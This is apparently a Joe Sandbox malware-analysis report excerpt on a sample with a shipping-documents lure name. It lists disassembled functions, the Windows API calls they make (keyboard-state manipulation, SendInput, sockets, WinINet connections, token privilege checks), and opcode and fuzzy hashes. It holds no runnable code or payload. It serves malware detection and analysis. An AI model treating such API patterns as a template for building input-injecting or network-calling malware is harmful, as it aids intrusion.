                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: 0bd2f88db26731ea255a9f03d6a4141d8536e17057dc2f7334b75761fa3375cb
                                                • Instruction ID: 061929b02193f40711c4a956d181e7fbe4beaf2f129f1220172407646f7d1f82
                                                • Opcode Fuzzy Hash: 0bd2f88db26731ea255a9f03d6a4141d8536e17057dc2f7334b75761fa3375cb
                                                • Instruction Fuzzy Hash: B9510B706093819EDB609F6AD891B7EB3EBAF14310F20881FF596CB2D1DB709844DB15
                                                Function 00719A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(0165E8A0,?), ref: 00719AD2
                                                • ScreenToClient.USER32(00000002,00000002), ref: 00719B05
                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00719B72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: c9d7397f95a4cf78bb503c5545b53afaa25afbde87b0fa7cc18bc46f98dc9675
                                                • Instruction ID: 40445bc0cb89b962093cdf2ccbd0e746dd8b30ac33d85b8c0bb36db2df7575c7
                                                • Opcode Fuzzy Hash: c9d7397f95a4cf78bb503c5545b53afaa25afbde87b0fa7cc18bc46f98dc9675
                                                • Instruction Fuzzy Hash: 5651F974A04209AFCF20DF68D8919EE7BB6FF55320F148269F9159B2D0D774AD82CB90
                                                Function 00706CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00706CE4
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706CF4
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00706D58
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706D64
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                • String ID:
                                                • API String ID: 2214342067-0
                                                • Opcode ID: 6a1d898168bb7a27b771b1c4ae99c0775ba40f7e718bcc24f888c16f4b4b98b5
                                                • Instruction ID: aab3f258bab7a30736ac705a1afb8ee5163669d9b106a7c774722a4302dfe077
                                                • Opcode Fuzzy Hash: 6a1d898168bb7a27b771b1c4ae99c0775ba40f7e718bcc24f888c16f4b4b98b5
                                                • Instruction Fuzzy Hash: 3341B134740200AFEF50AF28CC96F6A77EAAB04B20F44801CFA199B2D2DA759C008799
                                                Function 0070672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0071F910), ref: 007067BA
                                                • _strlen.LIBCMT ref: 007067EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID:
                                                • API String ID: 4218353326-0
                                                • Opcode ID: 20719142e7ed9aa8b757bce5381e882d4ace9fe6a1685168086af0fdfd759246
                                                • Instruction ID: 8df7ec7992825723034fba9e430b6dcf4490d124fff3bbf30c3285f50316ca9f
                                                • Opcode Fuzzy Hash: 20719142e7ed9aa8b757bce5381e882d4ace9fe6a1685168086af0fdfd759246
                                                • Instruction Fuzzy Hash: E641A431A00104EFCB54EB68DCD5EAEB3EAAF44314F14826DF816972D1DB34AD50C755
                                                Function 006FBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006FBB09
                                                • GetLastError.KERNEL32(?,00000000), ref: 006FBB2F
                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006FBB54
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006FBB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: a2e0022842317afca084396453092559533189e18495806652f567e9b3ea44c4
                                                • Instruction ID: adcbc1e0a21f1dd3a3f07504161b8dd720da47a3056f7b1a018655b6156a25f9
                                                • Opcode Fuzzy Hash: a2e0022842317afca084396453092559533189e18495806652f567e9b3ea44c4
                                                • Instruction Fuzzy Hash: 24411639200614DFCF10EF19C584A6DBBEAEF49310B09849CE94A9B762CB34FD01CBA5
                                                Function 00718AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                Download Yara Rule
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00718B4D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: fc0f1b80af14e6c2e98260f402dfd0dced97a20e1c37f31793867470c2a61a58
                                                • Instruction ID: 5bd2fdd520cf893424ccb1e315c243e1008e6f4f5c550817efc1e6cf2102030f
                                                • Opcode Fuzzy Hash: fc0f1b80af14e6c2e98260f402dfd0dced97a20e1c37f31793867470c2a61a58
                                                • Instruction Fuzzy Hash: 083190F4608204BFEBB09B1CCC85BE937A5EB05310F648616FA51E62E0CE3CA9C09656
                                                Function 0071ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 0071AE1A
                                                • GetWindowRect.USER32(?,?), ref: 0071AE90
                                                • PtInRect.USER32(?,?,0071C304), ref: 0071AEA0
                                                • MessageBeep.USER32(00000000), ref: 0071AF11
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: 87384b047b1497cb97b01689743f9e745acabe4b2195e3c0a46712bb721614e7
                                                • Instruction ID: 3610f2260aa57756f79df4f48b79856f5a8a065b3e204f8110a15b714da736f5
                                                • Opcode Fuzzy Hash: 87384b047b1497cb97b01689743f9e745acabe4b2195e3c0a46712bb721614e7
                                                • Instruction Fuzzy Hash: E8418D70601219EFCB11CF5CC885AE97BF5FB48351F1881A9E814DB291D738E986DF92
                                                Function 006F0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006F1037
                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 006F1053
                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006F10B9
                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006F110B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 97acd75d246a9250857afd4c72cb5dd647d37c12b8f3523322109af52d44938f
                                                • Instruction ID: 845f3aeaf1765d5128aa43279f1a5830120c43e3436cfd8dcd48261f5face626
                                                • Opcode Fuzzy Hash: 97acd75d246a9250857afd4c72cb5dd647d37c12b8f3523322109af52d44938f
                                                • Instruction Fuzzy Hash: BA313B30E4469CEEFB30CB698C057F9BBABAB46350F04821AE7805A2D1CF7449D19765
                                                Function 006F1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 006F1176
                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 006F1192
                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 006F11F1
                                                • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 006F1243
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: a121f8ee64c42ead1890e1874d69154c2c2746db417ddc61eb19069f74ab95c0
                                                • Instruction ID: 31b36aecc4262ecac90dc3888e51236cda7362898997682cc701653cc7334e5a
                                                • Opcode Fuzzy Hash: a121f8ee64c42ead1890e1874d69154c2c2746db417ddc61eb19069f74ab95c0
                                                • Instruction Fuzzy Hash: D9315A3094060CDEFF30CBA98C147FABBABAB4A350F04831EF7909A6D1C3394A959755
                                                Function 006C6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006C644B
                                                • __isleadbyte_l.LIBCMT ref: 006C6479
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006C64A7
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006C64DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 6284525b4a01dec12163be6bb3f61e7d0399142aaba4c0d440660185ff40bdbd
                                                • Instruction ID: ad3f98ebe3100f0ade92faa9aa714607145e769b8b7ea3e5530e6efb1f319615
                                                • Opcode Fuzzy Hash: 6284525b4a01dec12163be6bb3f61e7d0399142aaba4c0d440660185ff40bdbd
                                                • Instruction Fuzzy Hash: B631AC31600256AFDB298F65C845FBA7BEAFF40310F15C02DF854872A1EB31D891DB98
                                                Function 00715175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00715189
                                                  • Part of subcall function 006F387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006F3897
                                                  • Part of subcall function 006F387D: GetCurrentThreadId.KERNEL32 ref: 006F389E
                                                  • Part of subcall function 006F387D: AttachThreadInput.USER32(00000000,?,006F52A7), ref: 006F38A5
                                                • GetCaretPos.USER32(?), ref: 0071519A
                                                • ClientToScreen.USER32(00000000,?), ref: 007151D5
                                                • GetForegroundWindow.USER32 ref: 007151DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: a7df68b64eba48a1a01537f1cbe7d2a88e470bec04f07ead66abf63994f91635
                                                • Instruction ID: 4b3abe071f8be71b39dc82ad6104bcfee91ebc196ac6f827cd7082215f374210
                                                • Opcode Fuzzy Hash: a7df68b64eba48a1a01537f1cbe7d2a88e470bec04f07ead66abf63994f91635
                                                • Instruction Fuzzy Hash: A5310D71900108AFDB44EFA9C8859EFB7FEEF98300F10806EE515E7251EA759E45CBA4
                                                Function 0071C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • GetCursorPos.USER32(?), ref: 0071C7C2
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006CBBFB,?,?,?,?,?), ref: 0071C7D7
                                                • GetCursorPos.USER32(?), ref: 0071C824
                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006CBBFB,?,?,?), ref: 0071C85E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                • String ID:
                                                • API String ID: 2864067406-0
                                                • Opcode ID: c88d086b65ad90b00a45acc20fe975615e55121a093be690158b72cc38dbf2df
                                                • Instruction ID: 4d98bc40d9b3d3805e02cadb9ff1e8d6ea58f444a8d87b47d68f1ed09169aff5
                                                • Opcode Fuzzy Hash: c88d086b65ad90b00a45acc20fe975615e55121a093be690158b72cc38dbf2df
                                                • Instruction Fuzzy Hash: 1A319635500118EFCB16CF9CC8D8EEA7BB6EB49310F448169F9058B2A1C7799D90DF64
                                                Function 006B0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                Download Yara Rule
                                                APIs
                                                • __setmode.LIBCMT ref: 006B0BF2
                                                  • Part of subcall function 00695B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006F7B20,?,?,00000000), ref: 00695B8C
                                                  • Part of subcall function 00695B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006F7B20,?,?,00000000,?,?), ref: 00695BB0
                                                • _fprintf.LIBCMT ref: 006B0C29
                                                • OutputDebugStringW.KERNEL32(?), ref: 006E6331
                                                  • Part of subcall function 006B4CDA: _flsall.LIBCMT ref: 006B4CF3
                                                • __setmode.LIBCMT ref: 006B0C5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                • String ID:
                                                • API String ID: 521402451-0
                                                • Opcode ID: b0bb898d04a09a61ba8d22bff3711f7a4e79833bca332a3aaeeb4f2c33cc0fb8
                                                • Instruction ID: 25cd2649246b0ab52055a0891242cd7e93799074b52127a47847e6f4b80d954c
                                                • Opcode Fuzzy Hash: b0bb898d04a09a61ba8d22bff3711f7a4e79833bca332a3aaeeb4f2c33cc0fb8
                                                • Instruction Fuzzy Hash: C81102B29042187EDB45B3B8AC429FE7F6FAF41320F14416EF20597193EF71198283A9
                                                Function 006E8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006E8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E8669
                                                  • Part of subcall function 006E8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E8673
                                                  • Part of subcall function 006E8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8682
                                                  • Part of subcall function 006E8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8689
                                                  • Part of subcall function 006E8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E869F
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E8BEB
                                                • _memcmp.LIBCMT ref: 006E8C0E
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E8C44
                                                • HeapFree.KERNEL32(00000000), ref: 006E8C4B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                • String ID:
                                                • API String ID: 1592001646-0
                                                • Opcode ID: 351937fd024da08ed23b9e65b09372a8094b5a3bfa3894fb824248cee01f60ab
                                                • Instruction ID: c914a3f8a8727a7bca748394f79de14fe878d12ee53e31d9f8b89e135c24476e
                                                • Opcode Fuzzy Hash: 351937fd024da08ed23b9e65b09372a8094b5a3bfa3894fb824248cee01f60ab
                                                • Instruction Fuzzy Hash: 9E21B071E02208EFCB00CFA5C948BEEB7B9EF45744F148099E458A7240EB30AE06CB60
                                                Function 00701A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00701A97
                                                  • Part of subcall function 00701B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00701B40
                                                  • Part of subcall function 00701B21: InternetCloseHandle.WININET(00000000), ref: 00701BDD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Internet$CloseConnectHandleOpen
                                                • String ID:
                                                • API String ID: 1463438336-0
                                                • Opcode ID: 819036aadfec4f457c65f96ffa6ae940980c67ab96323092917d361d7cd33015
                                                • Instruction ID: 9922b2aee79aa5bfa97ad0e399d73d6419d449b776046a8238cbfbcf1e24cd26
                                                • Opcode Fuzzy Hash: 819036aadfec4f457c65f96ffa6ae940980c67ab96323092917d361d7cd33015
                                                • Instruction Fuzzy Hash: FD21CF72200600FFDB169F648C05FBAB7EDFF44700F90821AFA05966D1EB3998119BA4
                                                Function 006EE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006EF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,006EE1C4,?,?,?,006EEFB7,00000000,000000EF,00000119,?,?), ref: 006EF5BC
                                                  • Part of subcall function 006EF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 006EF5E2
                                                  • Part of subcall function 006EF5AD: lstrcmpiW.KERNEL32(00000000,?,006EE1C4,?,?,?,006EEFB7,00000000,000000EF,00000119,?,?), ref: 006EF613
                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,006EEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 006EE1DD
                                                • lstrcpyW.KERNEL32(00000000,?), ref: 006EE203
                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,006EEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 006EE237
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen
                                                • String ID: cdecl
                                                • API String ID: 4031866154-3896280584
                                                • Opcode ID: 708159784389af24737b58787903eeedce1c58d050a0e3d83c0422ccccde3f94
                                                • Instruction ID: 246e074d0645c02c40dc1fbe55e8fda5280405381c04c6d863ebbaca8cc42cc2
                                                • Opcode Fuzzy Hash: 708159784389af24737b58787903eeedce1c58d050a0e3d83c0422ccccde3f94
